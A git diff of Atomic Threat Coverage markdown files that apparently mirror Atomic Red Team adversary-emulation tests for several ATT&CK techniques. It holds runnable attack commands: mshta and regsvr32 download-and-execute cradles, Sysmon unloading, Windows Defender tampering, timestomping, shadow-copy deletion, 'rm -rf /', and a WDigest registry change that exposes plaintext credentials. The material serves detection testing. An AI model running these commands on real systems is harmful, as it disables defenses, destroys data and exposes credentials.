| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `command_prompt`!
```powershell
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```cmd
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@ -334,7 +306,7 @@ Powershell invoke mshta to download payload
<br/>
<br/>
## Atomic Test #11 - Powershell Invoke-DownloadCradle
## Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@ -356,8 +328,9 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
<br/>
## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
## Atomic Test #11 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
**Supported Platforms:** Windows
@ -365,7 +338,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
@ -387,7 +360,7 @@ cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
<br/>
<br/>
## Atomic Test #13 - PowerShell Downgrade Attack
## Atomic Test #12 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
@ -423,8 +396,8 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
<br/>
<br/>
## Atomic Test #14 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file
## Atomic Test #13 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows

2
Atomic_Threat_Coverage/Triggers/T1087.md
View File

@ -165,7 +165,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely
Show if a user account has ever logged in remotely
**Supported Platforms:** Linux, macOS
**Supported Platforms:** Linux

64
Atomic_Threat_Coverage/Triggers/T1089.md
View File

@ -239,7 +239,8 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
<br/>
## Atomic Test #8 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
**Supported Platforms:** Windows
@ -261,22 +262,45 @@ fltmc.exe unload #{sysmon_driver}
#### Cleanup Commands:
```cmd
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: Sysmon filter must be loaded
#### Dependencies: Run with `powershell`!
##### Description: Sysmon must be downloaded
##### Check Prereq Commands:
```cmd
fltmc.exe filters | findstr #{sysmon_driver}
```powershell
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
echo Automated installer not implemented yet, please install Sysmon manually
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
```
##### Description: sysmon must be Installed
##### Check Prereq Commands:
```powershell
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
```
##### Description: sysmon filter must be loaded
##### Check Prereq Commands:
```powershell
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
sysmon -u
sysmon -accepteula -i
```
@ -533,7 +557,8 @@ Credit to Matt Graeber (@mattifestation) for the research.
<br/>
## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
Attempting to disable scheduled scanning and other parts of windows defender atp
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** Windows
@ -567,7 +592,8 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
<br/>
## Atomic Test #17 - Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
**Supported Platforms:** Windows
@ -598,7 +624,8 @@ sc config WinDefend start=enabled
<br/>
## Atomic Test #18 - Tamper with Windows Defender Registry
Disable Windows Defender from starting after a reboot
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
**Supported Platforms:** Windows
@ -626,7 +653,10 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
<br/>
## Atomic Test #19 - Disable Microft Office Security Features
Gorgon group may disable Office security features so that their code can run
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
@ -662,8 +692,10 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
<br/>
## Atomic Test #20 - Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware
Check MpCmdRun.exe man page for info on all arguments
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows

74
Atomic_Threat_Coverage/Triggers/T1099.md
View File

@ -148,9 +148,8 @@ touch -acmr #{reference_file_path} #{target_file_path}
<br/>
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
Modifies the file creation timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
**Supported Platforms:** Windows
@ -160,7 +159,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change creation timestamp | Path | $env:APPDATA&#92;atomic.txt|
| file_path | Path of file to change creation timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@ -168,27 +167,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
New-Item #{file_path} -Force
Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
Remove-Item #{file_path} -Force
Remove-Item #{file_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist at the path (#{file_path}) to change the creation time on
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
<br/>
<br/>
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
Modifies the file last modified timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
**Supported Platforms:** Windows
@ -198,7 +207,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last modified timestamp | Path | $env:APPDATA&#92;atomic.txt|
| file_path | Path of file to change modified timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@ -206,27 +215,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
New-Item #{file_path} -Force
Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
Remove-Item #{file_path} -Force
Remove-Item #{file_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist at the path (#{file_path}) to change the modified time on
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
<br/>
<br/>
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
Modifies the last access timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
**Supported Platforms:** Windows
@ -236,7 +255,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last access timestamp | Path | $env:APPDATA&#92;atomic.txt|
| file_path | Path of file to change last access timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@ -244,18 +263,29 @@ This technique was seen in use by the Stitch RAT.
```powershell
New-Item #{file_path} -Force
Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
Remove-Item #{file_path} -Force
Remove-Item #{file_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist at the path (#{file_path}) to change the last access time on
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
<br/>

234
Atomic_Threat_Coverage/Triggers/T1107.md
View File

@ -20,19 +20,11 @@ There are tools available from the host operating system to perform cleanup, but
- [Atomic Test #7 - Delete an entire folder - Windows PowerShell](#atomic-test-7---delete-an-entire-folder---windows-powershell)
- [Atomic Test #8 - Delete VSS - vssadmin](#atomic-test-8---delete-vss---vssadmin)
- [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
- [Atomic Test #9 - Delete VSS - wmic](#atomic-test-9---delete-vss---wmic)
- [Atomic Test #9 - Delete-PrefetchFile](#atomic-test-9---delete-prefetchfile)
- [Atomic Test #10 - bcdedit](#atomic-test-10---bcdedit)
- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
- [Atomic Test #13 - Delete-PrefetchFile](#atomic-test-13---delete-prefetchfile)
- [Atomic Test #14 - Delete TeamViewer Log Files](#atomic-test-14---delete-teamviewer-log-files)
- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
<br/>
@ -125,203 +117,172 @@ shred -u #{file_to_shred}
<br/>
## Atomic Test #4 - Delete a single file - Windows cmd
Delete a single file from the temporary directory using cmd.exe
Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1107|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt >nul 2>&1
del /f #{file_to_delete}
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
##### Check Prereq Commands:
```cmd
IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo deleteme_T1107 >> #{file_to_delete}
```
<br/>
<br/>
## Atomic Test #5 - Delete an entire folder - Windows cmd
Recursively delete the temporary directory and all files contained within it using cmd.exe
Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1107|
#### Attack Commands: Run with `command_prompt`!
```cmd
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
rmdir /s /q #{folder_to_delete}
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
##### Check Prereq Commands:
```cmd
IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
mkdir #{folder_to_delete}
```
<br/>
<br/>
## Atomic Test #6 - Delete a single file - Windows PowerShell
Delete a single file from the temporary directory using Powershell
Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_T1107|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
Remove-Item -path #{file_to_delete}
```
#### Dependencies: Run with `powershell`!
##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_to_delete} | Out-Null
```
<br/>
<br/>
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
Recursively delete the temporary directory and all files contained within it using Powershell
Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_folder_T1107|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
Remove-Item -Path #{folder_to_delete} -Recurse
```
<br/>
<br/>
## Atomic Test #8 - Delete VSS - vssadmin
Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe Delete Shadows /All /Quiet
#### Dependencies: Run with `powershell`!
##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
##### Check Prereq Commands:
```powershell
if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
```
<br/>
<br/>
## Atomic Test #9 - Delete VSS - wmic
Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic shadowcopy delete
```
<br/>
<br/>
## Atomic Test #10 - bcdedit
This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
<br/>
<br/>
## Atomic Test #11 - wbadmin
This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #12 - Delete Filesystem - Linux
## Atomic Test #8 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux
@ -345,8 +306,9 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
<br/>
<br/>
## Atomic Test #13 - Delete-PrefetchFile
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.
## Atomic Test #9 - Delete-PrefetchFile
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
before and after the test to verify that the number of prefetch files decreases by 1.
**Supported Platforms:** Windows
@ -369,34 +331,46 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
<br/>
<br/>
## Atomic Test #14 - Delete TeamViewer Log Files
## Atomic Test #10 - Delete TeamViewer Log Files
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewerXX_Logfile.log
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
**Supported Platforms:** Windows, macOS
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;TeamViewer_54.log|
#### Attack Commands: Run with `powershell`!
```powershell
if ($env:os -eq "Windows_NT") {
New-Item $env:TEMP\TeamViewer_54.log
Remove-Item $env:TEMP\TeamViewer_54.log
} else {
New-Item $env:HOME\TeamViewer_54.log
Remove-Item $env:HOME\TeamViewer_54.log
}
Remove-Item #{teamviewer_log_file}
```
#### Dependencies: Run with `powershell`!
##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{teamviewer_log_file} | Out-Null
```
<br/>

158
Atomic_Threat_Coverage/Triggers/T1112.md
View File

@ -14,21 +14,18 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #2 - Modify Registry of Local Machine - cmd](#atomic-test-2---modify-registry-of-local-machine---cmd)
- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
- [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
- [Atomic Test #4 - Modify registry to store logon credentials](#atomic-test-4---modify-registry-to-store-logon-credentials)
- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
- [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
- [Atomic Test #7 - Javascript in registry](#atomic-test-7---javascript-in-registry)
- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
<br/>
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
Modify the registry of the currently logged in user using reg.exe cia cmd console
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
@ -57,19 +54,25 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights.
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
```
#### Cleanup Commands:
@ -84,83 +87,10 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
<br/>
<br/>
## Atomic Test #3 - Modify Registry of Another User Profile
Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
# Get Username, SID, and location of ntuser.dat for all users
$ProfileList = @()
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
Select @{ name = "SID"; expression = { $_.PSChildName } },
@{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
@{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
$SIDObject = @()
foreach ($item in $LoadedHives)
{
$props = @{
SID = $item.SID
}
$TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
$SIDObject += $TempSIDObject
}
# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
# if the count is less than 2 it doesn't work. :)
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
{
for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
{
if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
{
$UnloadedHives += $ProfileList[$p].SID
Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
Write-Verbose -Message 'Attempting to modify registry keys for each profile'
#####################################################################
reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
}
}
}
Write-Verbose 'Unloading Registry hives for all users'
# Unload ntuser.dat
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
```
<br/>
<br/>
## Atomic Test #4 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
## Atomic Test #3 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
@ -187,8 +117,12 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
<br/>
<br/>
## Atomic Test #5 - Modify registry to store PowerShell code
Sets Windows Registry key containing base64-encoded PowerShell code.
## Atomic Test #4 - Add domain to Trusted sites Zone
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
@ -198,49 +132,14 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
| bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
#### Attack Commands: Run with `powershell`!
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #6 - Add domain to Trusted sites Zone
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`!
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
@ -250,7 +149,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
#### Cleanup Commands:
```powershell
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
```
@ -261,8 +160,9 @@ Remove-item $key -Recurse -ErrorAction Ignore
<br/>
<br/>
## Atomic Test #7 - Javascript in registry
Upon execution, a javascript block will be placed in the registry for persistence
## Atomic Test #5 - Javascript in registry
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows

7
Atomic_Threat_Coverage/Triggers/T1117.md
View File

@ -20,7 +20,7 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish Pe
<br/>
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@ -91,7 +92,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll
<br/>
## Atomic Test #3 - Regsvr32 local DLL execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows

26
Atomic_Threat_Coverage/Triggers/T1119.md
View File

@ -18,7 +18,8 @@ This technique may incorporate use of other techniques such as [File and Directo
<br/>
## Atomic Test #1 - Automated Collection Command Prompt
Automated Collection
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
to see what was collected.
**Supported Platforms:** Windows
@ -30,10 +31,15 @@ Automated Collection
```cmd
mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
